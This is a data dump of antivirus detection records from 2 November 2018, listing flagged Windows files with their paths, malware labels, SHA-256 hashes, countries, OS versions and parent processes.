  Row(detection=Row(filename='proximitymine.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\PROXIMITYMINE\\PROXIMITYMINE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\0D70C1750382FB0BA03B7D6912C1A3C425C0AAFB7A2CC66464A27100EF6A1C4C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10116804\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T02:49:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='com.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\COM\\COM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sipesat.exe', filepath='D:\\DOKUMENKU\\LAPOR SIPESAT\\SIPESAT.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Dark Light Client 1.8\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='600d63c03b1447756de18eb1fb6e95c4b31af78b082567001416de20d838e3ad', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:34:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vision experience.exe', filepath='C:\\Users\\X\\Pictures\\NVIDIA Corporation\\3D Vision Experience\\Vision Experience.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4175421\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\pivot_v4-2.exe', parentsize=1903968, timestamp='2018-11-02T13:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7611427\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Odin3_v1.85.exe', parentsize=2821656, timestamp='2018-11-02T02:15:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113928-a0ee0d4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15ada250\\AVSCAN-20181102-110621-CFCDA2BD\\AVSCAN-20181102-113928-A0EE0D4D', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132747-adf138c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c1724d\\AVSCAN-20181102-132557-9F4A2AD7\\AVSCAN-20181102-132747-ADF138C0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1453912, timestamp='2018-11-02T17:23:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='454eed6fc18324b5a6e5255b1ec309993557dc0d7c13e0893d716f5cacbc0e95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:33:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183739-b5aef61a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183739-B5AEF61A', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181953-9337d451', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-181953-9337D451', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092226-367d1a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7746b5b7\\AVSCAN-20181102-092211-33E1C3D6\\AVSCAN-20181102-092226-367D1A25', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102557-d507ef97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43dae44a\\AVSCAN-20181102-102458-C95812D8\\AVSCAN-20181102-102557-D507EF97', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='3826e80b1ace3bd83e0a0a6e33829b88dd551354630f7990ff84266902f7e989', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jre-8u91-windows-i586.exe', filepath='C:\\program files\\djkn-siman\\Resource\\Java\\jre-8u91-windows-i586.exe', filesize=51072000, name='TR/Patched.Ren.Gen.#M300.#R344'), hash='2798a5446a67a48d75aa894ddf982e21b4a72ba75d00cc4fcc921d985391d130', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xxnxzl\\\\\\/wAEutAavd.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T13:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='corel.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Corel.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215419-41d5e277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215419-41D5E277', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052246-4da7c8c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052246-4DA7C8C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152632-77270b1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152632-77270B1F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061229-3facc6e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061229-3FACC6E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053954-b23ded05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053954-B23DED05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054228-0e25ead7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054228-0E25EAD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f6a', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f6a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053153-93c25fdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053153-93C25FDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051508-3cb5d22f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051508-3CB5D22F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133827-c21e5a50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133827-C21E5A50', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061210-343b8936', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061210-343B8936', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='C:\\Documents and Settings\\X\\Desktop\\Klein\\Scanari\\pdf TENDER DOCUMENT\\J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135605-86a63daf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135605-86A63DAF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:11Z'), dt=datetime.date(2018, 11, 2)),
